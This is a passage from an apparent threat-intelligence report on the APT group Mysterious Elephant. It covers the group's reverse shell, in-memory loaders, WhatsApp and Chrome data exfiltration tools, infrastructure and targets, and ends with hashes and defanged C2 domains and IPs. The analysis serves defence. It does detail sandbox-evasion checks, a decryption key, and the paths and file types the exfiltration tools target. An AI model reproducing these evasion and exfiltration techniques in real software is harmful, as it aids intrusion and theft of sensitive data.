Malicious PowerShell script seen in Mysterious Elephant’s 2025 attacks
For example, the script above is used to download the next-stage payload and save it as ping.exe. It then schedules a task to execute the payload and send the results back to the C2 server. The task is set to run automatically in response to changes in the network profile, ensuring persistence on the compromised system. Specifically, it is triggered by network profile-related events (Microsoft-Windows-NetworkProfile/Operational), which can indicate a new network connection. A four-hour delay is configured after the event, likely to help evade detection.
BabShell
One of the most recent tools used by Mysterious Elephant is BabShell. This is a reverse shell tool written in C++ that enables attackers to connect to a compromised system. Upon execution, it gathers system information, including username, computer name, and MAC address, to identify the machine. The malware then enters an infinite loop of performing the following steps:
- It listens for and receives commands from the attacker-controlled C2 server.
- For each received command, BabShell creates a separate thread to execute it, allowing for concurrent execution of multiple commands.
- The output of each command is captured and saved to a file named
output_[timestamp].txt, where [timestamp] is the current time. This allows the attacker to review the results of the commands. - The contents of the
output_[timestamp].txtfile are then transmitted back to the C2 server, providing the attacker with the outcome of the executed commands and enabling them to take further actions, for instance, deploy a next-stage payload or execute additional malicious instructions.
BabShell uses the following commands to execute command-line instructions and additional payloads it receives from the server:
Customized open-source tools
One of the latest modules used by Mysterious Elephant and loaded by BabShell is MemLoader HidenDesk.
MemLoader HidenDesk is a reflective PE loader that loads and executes malicious payloads in memory. It uses encryption and compression to evade detection.
MemLoader HidenDesk operates in the following manner:
- The malware checks the number of active processes and terminates itself if there are fewer than 40 processes running — a technique used to evade sandbox analysis.
- It creates a shortcut to its executable and saves it in the autostart folder, ensuring it can restart itself after a system reboot.
- The malware then creates a hidden desktop named “MalwareTech_Hidden” and switches to it, providing a covert environment for its activities. This technique is borrowed from an open-source project on GitHub.
- Using an RC4-like algorithm with the key
D12Q4GXl1SmaZv3hKEzdAhvdBkpWpwcmSpcD, the malware decrypts a block of data from its own binary and executes it in memory as a shellcode. The shellcode’s sole purpose is to load and execute a PE file, specifically a sample of the commercial RAT called “Remcos” (MD5: 037b2f6233ccc82f0c75bf56c47742bb).
Another recent loader malware used in the latest campaign is MemLoader Edge.
MemLoader Edge is a malicious loader that embeds a sample of the VRat backdoor, utilizing encryption and evasion techniques.
It operates in the following manner:
- The malware performs a network connectivity test by attempting to connect to the legitimate website
bing.com:445, which is likely to fail since the 445 port is not open on the server side. If the test were to succeed, suggesting that the loader is possibly in an emulation or sandbox environment, the malware would drop an embedded picture on the machine and display a popup window with three unresponsive mocked-up buttons, then enter an infinite loop. This is done to complicate detection and analysis. - If the connection attempt fails, the malware iterates through a 1016-byte array to find the correct XOR keys for decrypting the embedded PE file in two rounds. The process continues until the decrypted data matches the byte sequence of
MZ\x90, indicating that the real XOR keys are found within the array. - If the malware is unable to find the correct XOR keys, it will display the same picture and popup window as before, followed by a message box containing an error message after the window is closed.
- Once the PE file is successfully decrypted, it is loaded into memory using reflective loading techniques. The decrypted PE file is based on the open-source RAT vxRat, which is referred to as VRat due to the PDB string found in the sample:
C:\Users\admin\source\repos\vRat_Client\Release\vRat_Client.pdb
WhatsApp-specific exfiltration tools
Spying on WhatsApp communications is a key aspect of the exfiltration modules employed by Mysterious Elephant. They are designed to steal sensitive data from compromised systems. The attackers have implemented WhatsApp-specific features into their exfiltration tools, allowing them to target files shared through the WhatsApp application and exfiltrate valuable information, including documents, pictures, archive files, and more. These modules employ various techniques, such as recursive directory traversal, XOR decryption, and Base64 encoding, to evade detection and upload the stolen data to the attackers’ C2 servers.
- Uplo Exfiltrator
The Uplo Exfiltrator is a data exfiltration tool that targets specific file types and uploads them to the attackers’ C2 servers. It uses a simple XOR decryption to deobfuscate C2 domain paths and employs a recursive depth-first directory traversal algorithm to identify valuable files. The malware specifically targets file types that are likely to contain potentially sensitive data, including documents, spreadsheets, presentations, archives, certificates, contacts, and images. The targeted file extensions include .TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .CSV, .PPT, .PPTX, .ZIP, .RAR, .7Z, .PFX, .VCF, .JPG, .JPEG, and .AXX.
- Stom Exfiltrator
The Stom Exfiltrator is a commonly used exfiltration tool that recursively searches specific directories, including the “Desktop” and “Downloads” folders, as well as all drives except the C drive, to collect files with predefined extensions. Its latest variant is specifically designed to target files shared through the WhatsApp application. This version uses a hardcoded folder path to locate and exfiltrate such files:
%AppData%\\Packages\\xxxxx.WhatsAppDesktop_[WhatsApp ID]\\LocalState\\Shared\\transfers\\
The targeted file extensions include .PDF, .DOCX, .TXT, .JPG, .PNG, .ZIP, .RAR, .PPTX, .DOC, .XLS, .XLSX, .PST, and .OST.
- ChromeStealer Exfiltrator
The ChromeStealer Exfiltrator is another exfiltration tool used by Mysterious Elephant that targets Google Chrome browser data, including cookies, tokens, and other sensitive information. It searches specific directories within the Chrome user data of the most recently used Google Chrome profile, including the IndexedDB directory and the “Local Storage” directory. The malware uploads all files found in these directories to the attacker-controlled C2 server, potentially exposing sensitive data like chat logs, contacts, and authentication tokens. The response from the C2 server suggests that this tool was also after stealing files related to WhatsApp. The ChromeStealer Exfiltrator employs string obfuscation to evade detection.
Infrastructure
Mysterious Elephant’s infrastructure is a network of domains and IP addresses. The group has been using a range of techniques, including wildcard DNS records, to generate unique domain names for each request. This makes it challenging for security researchers to track and monitor their activities. The attackers have also been using virtual private servers (VPS) and cloud services to host their infrastructure. This allows them to easily scale and adapt their operations to evade detection. According to our data, this APT group has utilized the services of numerous VPS providers in their operations. Nevertheless, our analysis of the statistics has revealed that Mysterious Elephant appears to have a preference for certain VPS providers.
VPS providers most commonly used by Mysterious Elephant (download)
Victimology
Mysterious Elephant’s primary targets are government entities and foreign affairs sectors in the Asia-Pacific region. The group has been focusing on Pakistan, Bangladesh, and Sri Lanka, with a lower number of victims in other countries. The attackers have been using highly customized payloads tailored to specific individuals, highlighting their sophistication and focus on targeted attacks.
The group’s victimology is characterized by a high degree of specificity. Attackers often use personalized phishing emails and malicious documents to gain initial access. Once inside, they employ a range of tools and techniques to escalate privileges, move laterally, and exfiltrate sensitive information.
- Most targeted countries: Pakistan, Bangladesh, Afghanistan, Nepal and Sri Lanka
Countries targeted most often by Mysterious Elephant (download)
- Primary targets: government entities and foreign affairs sectors
Industries most targeted by Mysterious Elephant (download)
Conclusion
In conclusion, Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region. Through their continuous evolution and adaptation of tactics, techniques, and procedures, the group has demonstrated the ability to evade detection and infiltrate sensitive systems. The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.
The group’s focus on targeting specific organizations, combined with their ability to tailor their attacks to specific victims, underscores the severity of the threat they pose. The exfiltration of sensitive information, including documents, pictures, and archive files, can have significant consequences for national security and global stability.
To counter the Mysterious Elephant threat, it is essential for organizations to implement robust security measures, including regular software updates, network monitoring, and employee training. Additionally, international cooperation and information sharing among cybersecurity professionals, governments, and industries are crucial in tracking and disrupting the group’s activities.
Ultimately, staying ahead of Mysterious Elephant and other APT groups requires a proactive and collaborative approach to cybersecurity. By understanding their TTPs, sharing threat intelligence, and implementing effective countermeasures, we can reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands.
Indicators of compromise
File hashes
Malicious documents
c12ea05baf94ef6f0ea73470d70db3b2 M6XA.rar
8650fff81d597e1a3406baf3bb87297f 2025-013-PAK-MoD-Invitation_the_UN_Peacekeeping.rar
MemLoader HidenDesk
658eed7fcb6794634bbdd7f272fcf9c6 STI.dll
4c32e12e73be9979ede3f8fce4f41a3a STI.dll
MemLoader Edge
3caaf05b2e173663f359f27802f10139 Edge.exe, debugger.exe, runtime.exe
bc0fc851268afdf0f63c97473825ff75
BabShell
85c7f209a8fa47285f08b09b3868c2a1
f947ff7fb94fa35a532f8a7d99181cf1
Uplo Exfiltrator
cf1d14e59c38695d87d85af76db9a861 SXSHARED.dll
Stom Exfiltrator
ff1417e8e208cadd55bf066f28821d94
7ee45b465dcc1ac281378c973ae4c6a0 ping.exe
b63316223e952a3a51389a623eb283b6 ping.exe
e525da087466ef77385a06d969f06c81
78b59ea529a7bddb3d63fcbe0fe7af94
ChromeStealer Exfiltrator
9e50adb6107067ff0bab73307f5499b6 WhatsAppOB.exe
Domains/IPs
hxxps://storycentral[.]net
hxxp://listofexoticplaces[.]com
hxxps://monsoonconference[.]com
hxxp://mediumblog[.]online:4443
hxxp://cloud.givensolutions[.]online:4443
hxxp://cloud.qunetcentre[.]org:443
solutions.fuzzy-network[.]tech
pdfplugins[.]com
file-share.officeweb[.]live
fileshare-avp.ddns[.]net
91.132.95[.]148
62.106.66[.]80
158.255.215[.]45
securelist.com/mysterious-elep…
